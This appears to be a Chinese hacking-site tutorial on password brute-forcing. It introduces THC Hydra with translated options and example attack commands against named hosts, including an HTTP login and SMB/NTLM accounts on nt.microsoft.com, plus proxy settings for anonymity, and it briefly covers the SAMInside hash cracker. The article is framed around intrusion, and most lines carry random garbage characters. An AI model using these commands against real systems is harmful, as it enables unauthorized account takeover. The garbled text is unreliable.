Linux下暴力破解ssh密码的方法

网络安全中最暴力的是什么?大家也许会异口同声地说：“破解！”。不错，破解往往被很多高手所不齿，尤其是暴力破解很多人都认为这是无能的表现。但是破解有的时候却是入侵中唯一且有效的方法。
t&AFU tc 远程破解相信大家都用过，我首推hydra。
http://freeworld.thc.org/releases.php

1. The source code of Hydra: hydra-5.4-src.tar.gz
    (compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux, etc.)

 2. The Win32/Cywin binary release: hydra-5.4-win.zip
    (everything you need to run hydra on win32 platforms is in this zip file)

 4. The ARM binary release: hydra-5.0-arm.tar.gz (soon updated)
    (created by tick (at) thc (dot) org - everything except SAP R/3 is supported,
     runs on all Handhelds with ARM processors running Linux, e.g. iPaq, Zaurus, etc.)

 3. The Palm binary release: hydra-4.6-palm.zip
    (created by snakebyte (at) gmx (dot) de - does not support all attack modules yet)
           [NOTE: the Palm release has got a different source tree. Therefore not all]
           [      modules are supported, and updates are not very often.

这是一款*nix平台下的远程登陆密码破解工具。它支持TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL, MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, SMTP-AUTH, SSH2, SNMP, CVS, Cisco AAA众多登陆方式的密码破解。按照说明文件大家可以很容易地进行程序的编译。为了照顾那些windows的用户，在cygwin下编译出了win版本的 hydra。我也将以win下的hydra作为介绍。
*=V~YF: Qb 运行时说明如下：
)mF 5Vw" E:mfmexploithydra>hydra
Hydra v4.3 [_blank>http://www.thc.org] (c) 2004 by van Hauser / THC <vh@thc.org 7++DujE $ >
JzQ )jdvp
6g cF fo Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
XAF+0 x ! [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
DH\0z [ server service [OPT]
DtXr WS/
*U&0<{| T Options:
LR ~r%(rM -R 恢复先前中断的会话
a_f ~N1kq -S 通过SSL连接
9K { % vK -s PORT 如果服务端口不是默认的，在这里指定服务端口
Ve}(s?hU 5 -l LOGIN or -L FILE 指定LOGIN登陆帐户,或者是一个包含很多帐户的FILE文件
K L1/^ 1 -p PASS or -P FILE 指定欲使用的密码文件
x@P y>f2 -e ns 附加选项，"n" 检查空口令, "s" 尝试帐户名和密码相同检查
xjfV?B\'Y}V -C FILE 指定一个包含“login:pass”格式的文件，用以取代-L和-P选项。
] o* #t -M FILE 指定目标地址文件，一行一个地址。
ehzM ) uK -o FILE 将找到的帐户和密码记录到指定的文件中
D !{Y$ ; -f 在找到第一个帐户和密码对后结束探测
0 HGM4[ )= -t TASKS 指定线程数 (默认是 16)

-w TIME 指定响应最大等待时间(以秒为单位默认是 30)
4 !i $4 -v / -V 详细显示模式
UtPLI al server 指定目标地址
C7rNV 0.Fq service 要破解的服务，支持的有： [lnet.html' target='_blank'>telnet ftp pop3 imap smb
xbdN0 MA U smbnt http https http-proxy cisco cisco-enable ldap mssql mysql nntp vnc socks5
\'FqQzx"r rexec snmp cvs icq pcnfs sapr3 ssh2 smtp-auth]
SX< ` {x&L OPT 有些服务模块需要特定信息
j /R[<47
}Gaw V 我已经尽力将英文原版说明给大家翻译过来了。相信大家应该能看得懂的。
# r #1Jt T 需要说明一点的是上面的OPT可以是如下的值：
wG~` [>y ( service module optional parameter
A#Iyb ){Y ============== ==============================
k jg~ n9#T www / http / ssl / https
rX4j*u2u 指定验证页面可以是类似如下的值：
Value can be "/secret" or "_blank>http://bla.com/foo/bar % 5 m/ " or
"_blank>https://test.com:8080/members !j:9`XD | "
http-proxy 指定验证页面（可选，默认是_blank>http://www.suse.com/ ;1:Js0=;H )
5k` l $mW{ smbnt 值[L,LH,D,DH,B,BH] (REQUIRED)
QIBAA clO (L) 检测本地帐户 (D) 域帐户 (B)两者选其一
.} q& 5v (H) NTLM 散列
M@`;J jtSA ldap 指定DN (可选, 可以使用-l选项指定)
e7m*rh%5> cisco-enable specified the logon password for the cisco device (REQUIRED)
K% a%a6 k` sapr3 specified the client id, a number between 0 and 99 (REQUIRED)
X; i~ <Tq
[Jogt#Fj ] 我只翻译了我认为比较重要的地方，如果还不能理解的话我们来看几个例子吧。
我们想破解一个http登陆页面，登陆帐户是superlone，密码文件在当前目录中pass.txt,目标地址为_blank>www.attack.com *VFf.aPwYi ，那么此工具的命令行为：
hydra -l superlone -P pass.txt _blank>www.attack.com 4 x http /members/
%>~s J0
*v9 2 再比如我们要破解nt.microsoft.com上的本地帐户和NTLM密码散列，我们可以这样：
;$smH= I hydra -m LH -l administrator -P sam.dump nt.microsoft.com smbnt
h| ,:e; >} 同过上面的两个例子，读者应该会用这个工具了吧。在破解的时候可以随时按下ctrl+c组合键来终止猜解，下次想继续猜解得时候可以使用hydra –R来继续上次的猜解过程。
Ta"} TF8 对于http/www服务的猜解我们可以指定代理服务器。方法是指定环境变量：
/J=v]<87a HYDRA_PROXY_HTTP为指定的代理地址。比如：
E:mfmexploithydra> set HYDRA_PROXY_HTTP="_blank>http://222.124.114.10:

8080/"
Aa Ws} M
1C gso` 如果想为其它的服务也使用代理，那么需要指定HYDRA_PROXY_CONNECT值为代理地址。比如：
b [o "7^H HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
8W ,Jh8N6 如果代理服务器需要验证的话可以指定如下的环境变量值为指定帐户和密码：
` $ W_R[ HYDRA_PROXY_AUTH="the_login:the_password"
@ycDCB(D}
HY &aV2|A1 到这里这款工具基本上就介绍完了。不知道读者看过后会有怎么样的想法，也许和我一样为它的强大功能而叫好吧？
7 " 20hAd 介绍了远程，本地的肯定也不能拉下。估计说到这里肯定大家都会说本地的用lc地球人都知道。不错lc作为一款本地密码破解工具，确实非常强大也是众多黑家必备的工具了。然而今天我要介绍的是一款新软件---saminside，先看一下界面吧图十。
J i> o !
G Uon/ G8 看上去好像简单了点，点击第一个文件夹图标的下拉菜单，可以看到很多的选项，分别如下：
lDYyq G 4 Import from sam and system files….. 从本地sam数据库和系统文件中导入
W ST8SE zJ Import from sam and syskey file… 从本地sam数据库和syskey中导入
Ta(Y :*R i Import from PWDUMP file… 从pwdump文件中导入
D~ hg$Xz K Import from .LCP file…. 从.LCP文件中导入
u%} n w :> Import from .LCS file…. 从.LCS文件中导入
8u 6:=fxb Import from .LC file…. 从.LC文件中导入
mZ SD (
` A w^H ! 上一页 [1] [2]
B * ?]H*K
0AZ")< ^~7 VER 4.5
>/l? g5{ HYDRA 4.5 中文使用说明(我特别补充了几个使用例子,本说明是意译)
f m U {
Uw f + Term : FreeXploiT
1eS&&J5
cpL7 !>^=

Tags： 破解ssh

Tags：破解ssh